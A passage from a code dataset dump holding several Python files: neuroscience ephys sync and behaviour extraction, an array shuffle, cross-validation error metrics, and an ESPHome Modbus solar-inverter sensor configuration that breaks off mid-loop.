'wb')\n for sl in wg.slice:\n ss = sr.read_sync(sl)\n ind, fronts = dsp.fronts(ss, axis=0)\n sav = np.c_[(ind[0, :] + sl.start) / sr.fs, ind[1, :], fronts.astype(np.double)]\n sav.tofile(fid_ftcp)\n # print progress\n wg.print_progress()\n # close temp file, read from it and delete\n fid_ftcp.close()\n tim_chan_pol = np.fromfile(str(file_ftcp))\n tim_chan_pol = tim_chan_pol.reshape((int(tim_chan_pol.size / 3), 3))\n file_ftcp.unlink()\n sync = {'times': tim_chan_pol[:, 0],\n 'channels': tim_chan_pol[:, 1],\n 'polarities': tim_chan_pol[:, 2]}\n if save:\n alf.io.save_object_npy(output_path, sync, '_spikeglx_sync')\n return sync\n\n\ndef _bpod_events_extraction(bpod_t, bpod_fronts):\n \"\"\"\n From detected fronts on the bpod sync traces, outputs the synchronisation events\n related to trial start and valve opening\n :param bpod_t: numpy vector containing times of fronts\n :param bpod_fronts: numpy vector containing polarity of fronts (1 rise, -1 fall)\n :return: numpy arrays of times t_trial_start, t_valve_open and t_iti_in\n \"\"\"\n # make sure that there are no 2 consecutive fall or consecutive rise events\n assert(np.all(np.abs(np.diff(bpod_fronts)) == 2))\n # make sure that the first event is a rise\n assert(bpod_fronts[0] == 1)\n # take only even time differences: ie. from rising to falling fronts\n dt = np.diff(bpod_t)[::2]\n # detect start trials event assuming length is 0.1 ms except the first trial\n i_trial_start = np.r_[0, np.where(dt <= 1.66e-4)[0] * 2]\n t_trial_start = bpod_t[i_trial_start]\n # # the first trial we detect the first falling edge to which we subtract 0.1ms\n # t_trial_start[0] -= 1e-4\n # the last trial is a dud and should be removed\n t_trial_start = t_trial_start[:-1]\n # valve open events are between 50ms to 300 ms\n i_valve_open = np.where(np.logical_and(dt > 1.66e-4, dt < 0.4))[0] * 2\n i_valve_open = np.delete(i_valve_open, np.where(i_valve_open < 2))\n t_valve_open = bpod_t[i_valve_open]\n # ITI events are above 400 ms\n i_iti_in = np.where(dt > 0.4)[0] * 2\n i_iti_in = np.delete(i_iti_in, np.where(i_valve_open < 2))\n i_iti_in = bpod_t[i_iti_in]\n # # some debug plots when needed\n # import matplotlib.pyplot as plt\n # import ibllib.plots as plots\n # plt.figure()\n # plots.squares(bpod_t, bpod_fronts)\n # plots.vertical_lines(t_valve_open, ymin=-0.2, ymax=1.2, linewidth=0.5, color='g')\n # plots.vertical_lines(t_trial_start, ymin=-0.2, ymax=1.2, linewidth=0.5, color='r')\n return t_trial_start, t_valve_open, i_iti_in\n\n\ndef _rotary_encoder_positions_from_fronts(ta, pa, tb, pb):\n \"\"\"\n Extracts the rotary encoder absolute position (cm) as function of time from fronts detected\n on the 2 channels\n\n :param ta: time of fronts on channel A\n :param pa: polarity of fronts on channel A\n :param tb: time of fronts on channel B\n :param pb: polarity of fronts on channel B\n :return: indices vector (ta) and position vector\n \"\"\"\n p = pb[np.searchsorted(tb, ta) - 1] * pa\n p = np.cumsum(p) / WHEEL_TICKS * np.pi * WHEEL_RADIUS_CM\n return ta, p\n\n\ndef _rotary_encoder_positions_from_gray_code(channela, channelb):\n \"\"\"\n Extracts the rotary encoder absolute position (cm) as function of time from digital recording\n of the 2 channels.\n\n Rotary Encoder implements X1 encoding: http://www.ni.com/tutorial/7109/en/\n rising A & B high = +1\n rising A & B low = -1\n falling A & B high = -1\n falling A & B low = +1\n\n :param channelA: Vector of rotary encoder digital recording channel A\n :type channelA: numpy array\n :param channelB: Vector of rotary encoder digital recording channel B\n :type channelB: numpy array\n :return: indices vector and position vector\n \"\"\"\n # detect rising and falling fronts\n t, fronts = dsp.fronts(channela)\n # apply X1 logic to get positions in ticks\n p = (channelb[t] * 2 - 1) * fronts\n # convert position in cm\n p = np.cumsum(p) / WHEEL_TICKS * np.pi * WHEEL_RADIUS_CM\n return t, p\n\n\ndef _audio_events_extraction(audio_t, audio_fronts):\n \"\"\"\n From detected fronts on the audio sync traces, outputs the synchronisation events\n related to tone in\n\n :param audio_t: numpy vector containing times of fronts\n :param audio_fronts: numpy vector containing polarity of fronts (1 rise, -1 fall)\n :return: numpy arrays t_ready_tone_in, t_error_tone_in\n \"\"\"\n # make sure that there are no 2 consecutive fall or consecutive rise events\n assert(np.all(np.abs(np.diff(audio_fronts)) == 2))\n # make sure that the first event is a rise\n assert(audio_fronts[0] == 1)\n # take only even time differences: ie. from rising to falling fronts\n dt = np.diff(audio_t)[::2]\n # detect ready tone by length below 110 ms\n i_ready_tone_in = np.r_[1, np.where(dt <= 0.11)[0] * 2]\n t_ready_tone_in = audio_t[i_ready_tone_in]\n # error tones are events lasting from 400ms to 600ms\n i_error_tone_in = np.where(np.logical_and(0.4 < dt, dt < 0.6))[0] * 2\n t_error_tone_in = audio_t[i_error_tone_in]\n return t_ready_tone_in, t_error_tone_in\n\n\ndef _assign_events_to_trial(t_trial_start, t_event, take='last'):\n \"\"\"\n Assign events to a trial given trial start times and event times.\n\n Trials without an event\n result in nan value in output time vector.\n The output has a consistent size with t_trial_start and ready to output to alf.\n\n :param t_trial_start: numpy vector of trial start times\n :param t_event: numpy vector of event times to assign to trials\n :param take: 'last' or 'first' (optional, default 'last'): index to take in case of duplicates\n :return: numpy array of event times with the same shape of trial start.\n \"\"\"\n # make sure the events are sorted\n try:\n assert(np.all(np.diff(t_trial_start) >= 0))\n except AssertionError:\n raise ValueError('Trial starts vector not sorted')\n try:\n assert(np.all(np.diff(t_event) >= 0))\n except AssertionError:\n raise ValueError('Events vector is not sorted')\n # remove events that happened before the first trial start\n t_event = t_event[t_event >= t_trial_start[0]]\n ind = np.searchsorted(t_trial_start, t_event) - 1\n t_event_nans = np.zeros_like(t_trial_start) * np.nan\n # select first or last element matching each trial start\n if take == 'last':\n iall, iu = np.unique(np.flip(ind), return_index=True)\n t_event_nans[iall] = t_event[- (iu - ind.size + 1)]\n elif take == 'first':\n iall, iu = np.unique(ind, return_index=True)\n t_event_nans[iall] = t_event[iu]\n\n return t_event_nans\n\n\ndef _get_sync_fronts(sync, channel_nb):\n return {'times': sync['times'][sync['channels'] == channel_nb],\n 'polarities': sync['polarities'][sync['channels'] == channel_nb]}\n\n\ndef extract_wheel_sync(sync, output_path=None, save=False, chmap=SYNC_CHANNEL_MAP):\n \"\"\"\n Extract wheel positions and times from sync fronts dictionary for all 16 chans\n\n :param sync: dictionary 'times', 'polarities' of fronts detected on sync trace\n :param output_path: where to save the data\n :param save: True/False\n :param chmap: dictionary containing channel indices. Default to constant.\n chmap = {'rotary_encoder_0': 13, 'rotary_encoder_1': 14}\n :return: dictionary containing wheel data, 'wheel_ts', 're_ts'\n \"\"\"\n wheel = {}\n channela = _get_sync_fronts(sync, chmap['rotary_encoder_0'])\n channelb = _get_sync_fronts(sync, chmap['rotary_encoder_1'])\n wheel['re_ts'], wheel['re_pos'] = _rotary_encoder_positions_from_fronts(\n channela['times'], channela['polarities'], channelb['times'], channelb['polarities'])\n if save and output_path:\n output_path = Path(output_path)\n # last phase of the process is to save the alf data-files\n np.save(output_path / '_ibl_wheel.position.npy', wheel['re_pos'])\n np.save(output_path / '_ibl_wheel.times.npy', wheel['re_ts'])\n np.save(output_path / '_ibl_wheel.velocity.npy',\n whl.velocity(wheel['re_ts'], wheel['re_pos']))\n return wheel\n\n\ndef extract_behaviour_sync(sync, output_path=None, save=False, chmap=SYNC_CHANNEL_MAP):\n \"\"\"\n Extract wheel positions and times from sync fronts dictionary\n\n :param sync: dictionary 'times', 'polarities' of fronts detected on sync trace for all 16 chans\n :param output_path: where to save the data\n :param save: True/False\n :param chmap: dictionary containing channel index. Default to constant.\n chmap = {'bpod': 7, 'frame2ttl': 12, 'audio': 15}\n :return: trials dictionary\n \"\"\"\n bpod = _get_sync_fronts(sync, chmap['bpod'])\n frame2ttl = _get_sync_fronts(sync, chmap['frame2ttl'])\n audio = _get_sync_fronts(sync, chmap['audio'])\n # extract events from the fronts for each trace\n t_trial_start, t_valve_open, t_iti_in = _bpod_events_extraction(\n bpod['times'], bpod['polarities'])\n t_ready_tone_in, t_error_tone_in = _audio_events_extraction(\n audio['times'], audio['polarities'])\n # stim off time is the first frame2ttl rise/fall after the trial start\n # does not apply for 1st trial\n ind = np.searchsorted(frame2ttl['times'], t_trial_start[1:], side='left')\n t_stim_off = frame2ttl['times'][ind]\n # the t_stim_off happens 100ms after trial start\n assert(np.all((t_trial_start[1:] - t_stim_off) > -0.1))\n t_stim_freeze = frame2ttl['times'][ind - 1]\n\n if DEBUG_PLOTS:\n plt.figure()\n ax = plt.gca()\n plots.squares(bpod['times'], bpod['polarities'] * 0.4 + 1,\n ax=ax, label='bpod=1', color='k')\n plots.squares(frame2ttl['times'], frame2ttl['polarities'] * 0.4 + 2,\n ax=ax, label='frame2ttl=2', color='k')\n plots.squares(audio['times'], audio['polarities'] * 0.4 + 3,\n ax=ax, label='audio=3', color='k')\n plots.vertical_lines(t_ready_tone_in, ymin=0, ymax=4,\n ax=ax, label='ready tone in', color='b', linewidth=0.5)\n plots.vertical_lines(t_trial_start, ymin=0, ymax=4,\n ax=ax, label='start_trial', color='m', linewidth=0.5)\n plots.vertical_lines(t_error_tone_in, ymin=0, ymax=4,\n ax=ax, label='error tone', color='r', linewidth=0.5)\n plots.vertical_lines(t_valve_open, ymin=0, ymax=4,\n ax=ax, label='valve open', color='g', linewidth=0.5)\n plots.vertical_lines(t_stim_freeze, ymin=0, ymax=4,\n ax=ax, label='stim freeze', color='y', linewidth=0.5)\n plots.vertical_lines(t_stim_off, ymin=0, ymax=4,\n ax=ax, label='stim off', color='c', linewidth=0.5)\n ax.legend()\n\n # stimOn_times: first fram2ttl change after trial start\n trials = {\n 'ready_tone_in': _assign_events_to_trial(t_trial_start, t_ready_tone_in),\n 'error_tone_in': _assign_events_to_trial(t_trial_start, t_error_tone_in),\n 'valve_open': _assign_events_to_trial(t_trial_start, t_valve_open),\n 'stim_freeze': _assign_events_to_trial(t_trial_start, t_stim_freeze),\n 'stimOn_times': _assign_events_to_trial(t_trial_start, frame2ttl['times'], take='first'),\n 'iti_in': _assign_events_to_trial(t_trial_start, t_iti_in)\n }\n # goCue_times corresponds to the tone_in event\n trials['goCue_times'] = trials['ready_tone_in']\n # response_times is TONE_IN to STIM freeze\n trials['response_times'] = trials['stim_freeze'] - trials['ready_tone_in']\n # feedback times are valve open on good trials and error tone in on error trials\n trials['feedback_times'] = trials['valve_open']\n ind_err = np.isnan(trials['valve_open'])\n trials['feedback_times'][ind_err] = trials['error_tone_in'][ind_err]\n # # # # this is specific to version 4\n trials['iti_in'] = trials['valve_open'] + 1.\n trials['iti_in'][ind_err] = trials['error_tone_in'][ind_err] + 2.\n trials['intervals'] = np.c_[t_trial_start, trials['iti_in']]\n # # # # end of specific to version 4\n if save and output_path:\n output_path = Path(output_path)\n np.save(output_path / '_ibl_trials.goCue_times.npy', trials['goCue_times'])\n np.save(output_path / '_ibl_trials.response_times.npy', trials['response_times'])\n np.save(output_path / '_ibl_trials.stimOn_times.npy', trials['stimOn_times'])\n np.save(output_path / '_ibl_trials.intervals.npy', trials['intervals'])\n np.save(output_path / '_ibl_trials.feedback_times.npy', trials['feedback_times'])\n return trials\n\n\ndef align_with_bpod(session_path):\n \"\"\"\n Reads in trials.intervals ALF dataset from bpod and fpga.\n Asserts consistency between datasets and compute the median time difference\n\n :param session_path:\n :return: dt: median time difference of trial start times (fpga - bpod)\n \"\"\"\n # check consistency\n output_path = Path(session_path) / 'alf'\n trials = alf.io.load_object(output_path, '_ibl_trials')\n assert(alf.io.check_dimensions(trials) == 0)\n dt = (np.diff(trials['intervalsBpod']) - np.diff(trials['intervals']))\n assert(np.all(np.abs(dt[np.invert(np.isnan(dt))]) < 5 * 1e-3))\n dt = trials['intervals'][:, 0] - trials['intervalsBpod'][:, 0]\n # plt.plot(np.diff(trials['intervalsBpod']), '*')\n # plt.plot(np.diff(trials['intervals']), '.')\n return np.median(dt)\n\n\ndef extract_all(session_path, save=False, version=None):\n \"\"\"\n Reads ephys binary file and extract sync, wheel and behaviour ALF files\n\n :param session_path: '/path/to/subject/yyyy-mm-dd/001'\n :param save: Bool, defaults to False\n :param version: bpod version, defaults to None\n :return: None\n \"\"\"\n session_path = Path(session_path)\n output_path = session_path / 'alf'\n raw_ephys_path = session_path / 'raw_ephys_data'\n if not output_path.exists():\n output_path.mkdir()\n\n ephys_files = list(raw_ephys_path.rglob('*.ap.bin'))\n if len(ephys_files) > 2:\n raise NotImplementedError(\"Multiple probes/files extraction not implemented. Contact us !\")\n # TODO Extract channel maps from meta-data\n raw_ephys_apfile = ephys_files[0]\n sr = ibllib.io.spikeglx.Reader(raw_ephys_apfile)\n sync = _sync_to_alf(sr, output_path, save=save)\n # TODO Extract camera time-stamps\n extract_wheel_sync(sync, output_path, save=save)\n extract_behaviour_sync(sync, output_path, save=save)\n align_with_bpod(session_path) # checks consistency and compute dt with bpod\n","sub_path":"ibllib/io/extractors/ephys_fpga.py","file_name":"ephys_fpga.py","file_ext":"py","file_size_in_byte":16287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"305415437","text":"import random\n\ndef equallyLiklyShuffleArray(arr):\n start = 0\n end = len(arr) -1\n i = 0\n while i < end:\n idx = random.randint(i,end)\n #swap current array index value with get random idx value\n #and masked out current index from random selection\n arr[i] , arr[idx] = arr[idx], arr[i]\n i +=1\n return arr\n\nif __name__ == \"__main__\":\n arr = [1,2,3,4]\n i = 10\n while i > 0:\n print(\"Shuffle arr:\",equallyLiklyShuffleArray(arr))\n i -=1\n\n","sub_path":"iterator/equallyLikely.py","file_name":"equallyLikely.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478362524","text":"import os.path\r\nfrom random import shuffle\r\n\r\npath = \"ml-100k/\"\r\n\r\n\"\"\"\r\n@brief Divide o conjunto de dados em partes de tamanhos iguais\r\n\r\n@param arquivo Nome do arquivo de entrada\r\n@param divisoes Número de divisões do conjunto de dados\r\n@return dados_divididos Divisões do conjunto de dados\r\n\r\n\"\"\"\r\ndef dividir_base(arquivo, divisoes=5):\r\n\r\n\tdados = open(arquivo, 'r', encoding=\"utf-8\").readlines()\r\n\r\n\ttamanho = len(dados)\r\n\r\n\tif (tamanho % divisoes) != 0:\r\n\t\tprint(\"O número de divisões não gera partes de tamanhos iguais!\")\r\n\t\treturn None\r\n\r\n\ttamanho_parte = tamanho/ divisoes\r\n\r\n\tnome_base = path + \"base_%s.txt\"\r\n\r\n\tdados_divididos = []\r\n\r\n\tarquivos_existem = True\r\n\r\n\tfor i in range(divisoes):\r\n\r\n\t\tnome = nome_base % (i+1,)\r\n\r\n\t\tif os.path.exists(nome):\r\n\t\t\tf = open(nome_base % (i+1,), 'r')\r\n\r\n\t\t\tarquivos_existem = arquivos_existem and (len(f.readlines()) == tamanho_parte)\r\n\t\telse:\r\n\t\t\tarquivos_existem = False\r\n\r\n\tif not arquivos_existem:\r\n\r\n\t\tshuffle(dados)\r\n\r\n\t\tfor i in range(divisoes):\r\n\t\t\tdados_divididos.append( dados[ int(i*tamanho_parte) : int((i+1)*tamanho_parte)] )\r\n\r\n\t\t\twith open(nome_base % (i+1,), 'w') as f:\r\n\t\t\t\tfor linha in dados_divididos[i]:\r\n\t\t\t\t\tf.write(linha)\r\n\r\n\telse:\r\n\t\tfor i in range(divisoes):\r\n\t\t\twith open(nome_base % (i+1,), 'r') as f:\r\n\t\t\t\tdados_divididos.append(f.readlines())\r\n\r\n\treturn dados_divididos\r\n\r\n\"\"\"\r\n@brief Calcula a média absoluta do erro\r\n\r\nDados o gabarito e predito, calcula a média absoluta dos erros\r\n\r\n@param gabarito Gabarito do teste\r\n@param predito Lista das predições do teste\r\n@return mae Média absoluta do erro\r\n\r\n\"\"\"\r\ndef calcular_mae(gabarito, predito):\r\n\tmae = 0\r\n\tt = 0\r\n\tfor i in range(len(predito)):\r\n\t\tif predito[i] > 0:\r\n\t\t\tmae += abs(gabarito[i] - predito[i])\r\n\t\t\tt = t + 1\r\n\tmae /= t\r\n\treturn mae\r\n\r\ndef calcular_rmse(gabarito, predito):\r\n\trmse = 0\r\n\tt = 0\r\n\tfor i in range(len(predito)):\r\n\t\tif predito[i] > 0:\r\n\t\t\trmse += (gabarito[i] - predito[i])**2\r\n\t\t\tt = t + 1\r\n\trmse = (rmse/t)**.5\r\n\treturn rmse\r\n","sub_path":"Prediction/KNN/Envio/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"320673132","text":"from esphome.components.atm90e32.sensor import CONF_PHASE_A, CONF_PHASE_B, CONF_PHASE_C\nimport esphome.codegen as cg\nimport esphome.config_validation as cv\nfrom esphome.components import sensor, modbus\nfrom esphome.const import (\n CONF_ACTIVE_POWER,\n CONF_CURRENT,\n CONF_FREQUENCY,\n CONF_ID,\n CONF_POWER_FACTOR,\n CONF_REACTIVE_POWER,\n CONF_VOLTAGE,\n CONF_ENERGY,\n DEVICE_CLASS_CURRENT,\n DEVICE_CLASS_EMPTY,\n DEVICE_CLASS_ENERGY,\n DEVICE_CLASS_POWER,\n DEVICE_CLASS_POWER_FACTOR,\n DEVICE_CLASS_VOLTAGE,\n DEVICE_CLASS_TEMPERATURE,\n ICON_CURRENT_AC,\n ICON_EMPTY,\n ICON_FLASH,\n STATE_CLASS_MEASUREMENT,\n STATE_CLASS_NONE,\n UNIT_AMPERE,\n UNIT_DEGREES,\n UNIT_EMPTY,\n UNIT_HERTZ,\n UNIT_VOLT,\n UNIT_VOLT_AMPS,\n UNIT_VOLT_AMPS_REACTIVE,\n UNIT_VOLT_AMPS_REACTIVE_HOURS,\n UNIT_WATT,\n UNIT_WATT_HOURS,\n UNIT_MINUTE,\n)\n\nCONF_ENERGY_PRODUCTION_DAY = \"energy_production_day\"\nCONF_TOTAL_ENERGY_PRODUCTION = \"total_energy_production\"\nCONF_TOTAL_GENERAION_TIME = \"total_generation_time\"\nCONF_TODAY_GENERAION_TIME = \"today_generation_time\"\nCONF_PV1 = \"pv_1\"\nCONF_PV2 = \"pv_2\"\nUNIT_KILOWATT_HOURS = \"kWh\"\nUNIT_HOURS = \"hrs\"\nUNIT_KOHM = \"KΩ\"\nUNIT_MILIAMPERE = \"mA\"\n\n\nCONF_INVERTER_MODULE_TEMP = \"inverter_module_temp\" \nCONF_INVERTER_INNER_TEMP = \"inverter_inner_temp\" \nCONF_INVERTER_BUS_VOLTAGE = \"inverter_bus_voltage\" \nCONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU = \"pv1_volt_sampled_by_slave_cpu\"\nCONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU = \"pv2_volt_sampled_by_slave_cpu\" \nCONF_INSULATION_OF_PV1_P_TO_GROUND = \"insulation_pv1_p_to_ground\" \nCONF_INSULATION_OF_PV2_P_TO_GROUND = \"insulation_pv2_p_to_ground\" \nCONF_INSULATION_OF_PV_N_TO_GROUND = \"insulation_pv_n_to_ground\" \nCONF_GFCI_VALUE = \"gfci_value\" \nCONF_DCI_OF_R = \"dci_of_r\" \nCONF_DCI_OF_S = \"dci_of_s\" \nCONF_DCI_OF_T = \"dci_of_t\" \n\n\nAUTO_LOAD = [\"modbus\"]\nCODEOWNERS = [\"@sourabhjaiswal\"]\n\nhavells_solar_ns = cg.esphome_ns.namespace(\"havells_solar\")\nHAVELLSSolar = havells_solar_ns.class_(\"HAVELLSSolar\", cg.PollingComponent, modbus.ModbusDevice)\n\nPHASE_SENSORS = {\n CONF_VOLTAGE: sensor.sensor_schema(UNIT_VOLT, ICON_EMPTY, 2, DEVICE_CLASS_VOLTAGE),\n CONF_CURRENT: sensor.sensor_schema(\n UNIT_AMPERE, ICON_EMPTY, 2, DEVICE_CLASS_CURRENT, STATE_CLASS_MEASUREMENT\n ),\n}\nPV_SENSORS = {\n CONF_VOLTAGE: sensor.sensor_schema(UNIT_VOLT, ICON_EMPTY, 2, DEVICE_CLASS_VOLTAGE),\n CONF_CURRENT: sensor.sensor_schema(\n UNIT_AMPERE, ICON_EMPTY, 2, DEVICE_CLASS_CURRENT, STATE_CLASS_MEASUREMENT\n ),\n CONF_ACTIVE_POWER: sensor.sensor_schema(\n UNIT_WATT, ICON_EMPTY, 0, DEVICE_CLASS_POWER, STATE_CLASS_MEASUREMENT\n ),\n}\n\nPHASE_SCHEMA = cv.Schema(\n {cv.Optional(sensor): schema for sensor, schema in PHASE_SENSORS.items()}\n)\nPV_SCHEMA = cv.Schema(\n {cv.Optional(sensor): schema for sensor, schema in PV_SENSORS.items()}\n)\n\nCONFIG_SCHEMA = (\n cv.Schema(\n {\n cv.GenerateID(): cv.declare_id(HAVELLSSolar),\n cv.Optional(CONF_PHASE_A): PHASE_SCHEMA,\n cv.Optional(CONF_PHASE_B): PHASE_SCHEMA,\n cv.Optional(CONF_PHASE_C): PHASE_SCHEMA,\n cv.Optional(CONF_PV1): PV_SCHEMA,\n cv.Optional(CONF_PV2): PV_SCHEMA,\n cv.Optional(CONF_FREQUENCY): sensor.sensor_schema(\n UNIT_HERTZ,\n ICON_CURRENT_AC,\n 2,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_ACTIVE_POWER): sensor.sensor_schema(\n UNIT_WATT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_POWER,\n STATE_CLASS_MEASUREMENT\n ),\n cv.Optional(CONF_REACTIVE_POWER): sensor.sensor_schema(\n UNIT_VOLT_AMPS_REACTIVE,\n ICON_EMPTY,\n 2,\n DEVICE_CLASS_POWER,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_ENERGY_PRODUCTION_DAY): sensor.sensor_schema(\n UNIT_KILOWATT_HOURS,\n ICON_EMPTY,\n 2,\n DEVICE_CLASS_ENERGY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_TOTAL_ENERGY_PRODUCTION): sensor.sensor_schema(\n UNIT_KILOWATT_HOURS,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_ENERGY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_TOTAL_GENERAION_TIME): sensor.sensor_schema(\n UNIT_HOURS,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_TODAY_GENERAION_TIME): sensor.sensor_schema(\n UNIT_MINUTE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INVERTER_MODULE_TEMP): sensor.sensor_schema(\n UNIT_DEGREES,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INVERTER_INNER_TEMP): sensor.sensor_schema(\n UNIT_DEGREES,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INVERTER_BUS_VOLTAGE): sensor.sensor_schema(\n UNIT_VOLT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU): sensor.sensor_schema(\n UNIT_VOLT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU): sensor.sensor_schema(\n UNIT_VOLT,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INSULATION_OF_PV1_P_TO_GROUND): sensor.sensor_schema(\n UNIT_KOHM,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INSULATION_OF_PV2_P_TO_GROUND): sensor.sensor_schema(\n UNIT_KOHM,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_INSULATION_OF_PV_N_TO_GROUND): sensor.sensor_schema(\n UNIT_KOHM,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_GFCI_VALUE): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_DCI_OF_R): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_DCI_OF_S): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n cv.Optional(CONF_DCI_OF_T): sensor.sensor_schema(\n UNIT_MILIAMPERE,\n ICON_EMPTY,\n 0,\n DEVICE_CLASS_EMPTY,\n STATE_CLASS_MEASUREMENT,\n ),\n }\n )\n .extend(cv.polling_component_schema(\"10s\"))\n .extend(modbus.modbus_device_schema(0x01))\n)\n\n\nasync def to_code(config):\n var = cg.new_Pvariable(config[CONF_ID])\n await cg.register_component(var, config)\n await modbus.register_modbus_device(var, config)\n\n if CONF_FREQUENCY in config:\n sens = await sensor.new_sensor(config[CONF_FREQUENCY])\n cg.add(var.set_frequency_sensor(sens))\n \n if CONF_ACTIVE_POWER in config:\n sens = await sensor.new_sensor(config[CONF_ACTIVE_POWER])\n cg.add(var.set_active_power_sensor(sens))\n \n if CONF_REACTIVE_POWER in config:\n sens = await sensor.new_sensor(config[CONF_REACTIVE_POWER])\n cg.add(var.set_reactive_power_sensor(sens))\n\n if CONF_ENERGY_PRODUCTION_DAY in config:\n sens = await sensor.new_sensor(config[CONF_ENERGY_PRODUCTION_DAY])\n cg.add(var.set_today_production_sensor(sens))\n\n if CONF_TOTAL_ENERGY_PRODUCTION in config:\n sens = await sensor.new_sensor(config[CONF_TOTAL_ENERGY_PRODUCTION])\n cg.add(var.set_total_energy_production_sensor(sens))\n\n if CONF_TOTAL_GENERAION_TIME in config:\n sens = await sensor.new_sensor(config[CONF_TOTAL_GENERAION_TIME])\n cg.add(var.set_total_generation_time_sensor(sens))\n\n if CONF_TODAY_GENERAION_TIME in config:\n sens = await sensor.new_sensor(config[CONF_TODAY_GENERAION_TIME])\n cg.add(var.set_today_generation_time_sensor(sens))\n\n if CONF_INVERTER_MODULE_TEMP in config:\n sens = await sensor.new_sensor(config[CONF_INVERTER_MODULE_TEMP])\n cg.add(var.set_inverter_module_temp_sensor(sens))\n\n if CONF_INVERTER_INNER_TEMP in config:\n sens = await sensor.new_sensor(config[CONF_INVERTER_INNER_TEMP])\n cg.add(var.set_inverter_inner_temp_sensor(sens))\n\n if CONF_INVERTER_BUS_VOLTAGE in config:\n sens = await sensor.new_sensor(config[CONF_INVERTER_BUS_VOLTAGE])\n cg.add(var.set_inverter_bus_voltage_sensor(sens))\n\n if CONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU in config:\n sens = await sensor.new_sensor(config[CONF_PV1_VOLTAGE_SAMPLED_BY_SLAVE_CPU])\n cg.add(var.set_pv1_volt_sampled_by_slave_cpu_sensor(sens))\n\n if CONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU in config:\n sens = await sensor.new_sensor(config[CONF_PV2_VOLTAGE_SAMPLED_BY_SLAVE_CPU])\n cg.add(var.set_pv2_volt_sampled_by_slave_cpu_sensor(sens))\n\n if CONF_INSULATION_OF_PV1_P_TO_GROUND in config:\n sens = await sensor.new_sensor(config[CONF_INSULATION_OF_PV1_P_TO_GROUND])\n cg.add(var.set_insulation_pv1_p_to_ground_sensor(sens))\n\n if CONF_INSULATION_OF_PV2_P_TO_GROUND in config:\n sens = await sensor.new_sensor(config[CONF_INSULATION_OF_PV2_P_TO_GROUND])\n cg.add(var.set_insulation_pv2_p_to_ground_sensor(sens))\n\n if CONF_INSULATION_OF_PV_N_TO_GROUND in config:\n sens = await sensor.new_sensor(config[CONF_INSULATION_OF_PV_N_TO_GROUND])\n cg.add(var.set_insulation_pv_n_to_ground_sensor(sens))\n\n if CONF_GFCI_VALUE in config:\n sens = await sensor.new_sensor(config[CONF_GFCI_VALUE])\n cg.add(var.set_gfci_value_sensor(sens))\n\n if CONF_DCI_OF_R in config:\n sens = await sensor.new_sensor(config[CONF_DCI_OF_R])\n cg.add(var.set_dci_of_r_sensor(sens))\n\n if CONF_DCI_OF_S in config:\n sens = await sensor.new_sensor(config[CONF_DCI_OF_S])\n cg.add(var.set_dci_of_s_sensor(sens))\n\n if CONF_DCI_OF_T in config:\n sens = await sensor.new_sensor(config[CONF_DCI_OF_T])\n cg.add(var.set_dci_of_t_sensor(sens))\n\n for i, phase in enumerate([CONF_PHASE_A, CONF_PHASE_B, CONF_PHASE_C]):\n if phase not in config:\n continue\n\n phase_config = config[phase]\n for sensor_type in PHASE_SENSORS:\n if sensor_type in phase_config:\n sens = await sensor.new_sensor(phase_config[sensor_type])\n cg.add(getattr(var, f\"set_{sensor_type}_sensor\")(i, sens))\n \n for i, pv in enumerate([CONF_PV1, CONF_PV2]):\n if pv not in config:\n continue\n\n pv_config = config[pv]\n for sensor_type in pv_config:\n 